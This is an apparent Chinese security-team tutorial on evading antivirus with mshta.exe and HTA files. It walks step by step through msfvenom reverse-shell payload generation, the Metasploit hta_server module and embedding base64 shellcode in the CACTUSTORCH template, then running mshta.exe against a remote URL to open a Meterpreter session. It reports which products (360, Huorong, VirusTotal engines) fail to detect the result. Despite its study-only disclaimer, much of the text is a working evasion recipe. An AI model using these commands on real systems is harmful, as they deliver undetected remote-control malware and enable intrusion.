声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
额,这篇之前忘了推送了。。补一下。。
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus
几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp
模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160
(2020.01.01),火绒版本5.0.34.16
(2020.01.01),360安全卫士12.0.0.2002
(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com
(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。
Mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。
目前正常的hta文件用到的很少,偶尔见到了很可能就是恶意软件,很多免杀工具都是对shellcode进行处理后生产.hta文件,在windows下可以直接执行。
之前工具篇里多个工具都可以生成hta后门:
Venom:https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ
Unicorn:https://mp.weixin.qq.com/s/y7P6bvHRFes854EAHAPOzw
ASWCrypter:https://mp.weixin.qq.com/s/tT1i55swRWIYiEdxEWElSQ
GreatSCT:https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ
SharpShooter:https://mp.weixin.qq.com/s/EyvGfWXLbxkHe7liaNFhGg
CACTUSTORCH:https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw
Evasion:https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ
总体来看hta的免杀效果比较一般,其中专题18中的ASWCrypter算是稍微好一些的,主要是使用python对shellocde进行混淆,然后嵌入在hta中进行执行。我这里就不再介绍ASWCrypter,介绍几种其他的hta生成方法。
先试下msfvenom生成的原始的hta文件的查杀率
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test5.hta
virustotal.com上查杀率为28/56
Metasploit中包含了一个"HTA Web Server"模块,可直接生产hta文件,并提供了web分发功能,使用比较方便。
使用msf生成一个hta文件
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 10.211.55.2
msf exploit(windows/misc/hta_server) > set lhost 10.211.55.2
msf exploit(windows/misc/hta_server) > exploit
在测试机执行命令,360和火绒都会查杀。
mshta.exe http://10.211.55.2:8080/0Cv7XgxLzSvN.hta
virustotal.com中shell.exe文件28/58个报病毒
先下载代码模板wget https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta
1、首先要选择一个待注入的exe文件,默认是rundll32.exe
, 你也可以使用notepad.exe, calc.exe等,在CACTUSTORCH.hta
文件中直接修改就行。
2、使用 Cobalt Strike或Metasploit生成一个32位的shellcode
msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin
3、执行下面命令cat payload.bin | base64 -w 0
4、把生成的base64编码后的代码复制到CACTUSTORCH.hta
文件中的Dim code : code =
。
5、在测试机中执行mshta.exe http://10.211.55.2/CACTUSTORCH.hta
360和火绒都免杀,都可正常上线
msf中监听windows/meterpreter/reverse_https
可正常上线
virustotal.com上查杀率为26/58,这个查杀率还是挺高的。
使用mshta.exe绕过应用程序白名单(多种方法):https://www.cnblogs.com/backlion/p/10491616.html
基于白名单Mshta.exe执行:https://micro8.gitbook.io/micro8/contents-1/71-80/75-ji-yu-bai-ming-dan-mshta.exe-zhi-hang-payload-di-wu-ji
使用Meterpreter的多种姿势:https://wh0ale.github.io/2019/01/05/2019-1-4-%E4%BD%BF%E7%94%A8Meterpreter%E7%9A%84%E5%A4%9A%E7%A7%8D%E5%A7%BF%E5%8A%BF/
E
N
D
guān
关
zhù
注
wǒ
我
men
们
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
对安全感兴趣的小伙伴可以关注关注团队官网: http://www.TideSec.com 或长按二维码关注公众号: